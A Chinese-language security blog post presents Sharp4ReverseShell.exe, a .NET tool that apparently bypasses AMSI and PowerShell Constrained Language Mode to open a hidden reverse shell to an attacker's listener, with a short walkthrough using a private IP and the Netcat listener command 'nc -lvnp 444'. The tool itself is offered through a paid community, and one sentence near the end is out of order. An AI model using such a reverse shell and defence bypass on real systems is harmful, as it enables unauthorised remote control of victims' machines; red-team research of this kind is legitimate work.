PowerShell 曾是 Windows 环境中最具威胁性的载体,不仅能执行任意命令、远程加载脚本、内存加载 DLL,还能轻松集成 .NET 各种对象模型,深得攻击者喜爱。微软自然不会坐视不管,AMSI 和 CLM 两大防御体系随之而来,试图遏制这样的滥用行为。
然而在实际攻防中,安全研究者仍在不断寻找新的方法来绕过这些限制。Sharp4ReverseShell.exe 正是这种思路下诞生的一款工具:通过 .NET 原生方式绕过 AMSI 和 CLM,为红队打开一扇回到 FullLanguage 模式的后门。
Sharp4ReverseShell.exe
是一款由 .NET 编写的反弹 Shell 工具,核心功能包括:
绕过 AMSI 扫描机制,避免杀软拦截脚本。
绕过 CLM 限制模式,让受限用户获得 FullLanguage 权限。
在目标主机上弹出一个完整的交互式 Shell,连接到攻击者的监听端口,实现远程控制。
一句话总结:这是一个极简、稳定的 .NET 反弹工具,能完成反向连接与命令执行。
在目标 Windows 系统上运行 Sharp4ReverseShell.exe
,输入监听地址与端口号,如下所示。
请输入监听的 IP:192.168.101.150请输入监听端口:444
程序启动后,将创建一个隐藏的 PowerShell FullLanguage 会话,并向 IP 192.168.101.150 发起反向连接。
随后,在 Kali 上使用 Netcat 命令监听 444 端口,如下所示。
nc -lvnp 444
当连接建立成功后,攻击端即可看到类似如下内容,获得了一个 交互式、绕过限制、可持续执行命令的 shell。
综上
具已打包在星球,感兴趣的朋友可以加入自取。,
Sharp4ReverseShell.exe
是一个融合了 AMSI 绕过、CLM 绕过与内置执行的强力工具,极大拓展了攻击者在受限环境下的渗透能力,也为防御者提供了一个值得研究与拦截的新目标。文章涉及的工
从漏洞分析到安全攻防,我们涵盖了 .NET 安全各个关键方面,为您呈现最新、最全面的 .NET 安全知识,下面是公众号发布的精华文章集合,推荐大伙阅读!
20+专栏文章
海量资源和工具
专属成员交流群
已入驻的大咖们
欢迎加入我们
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...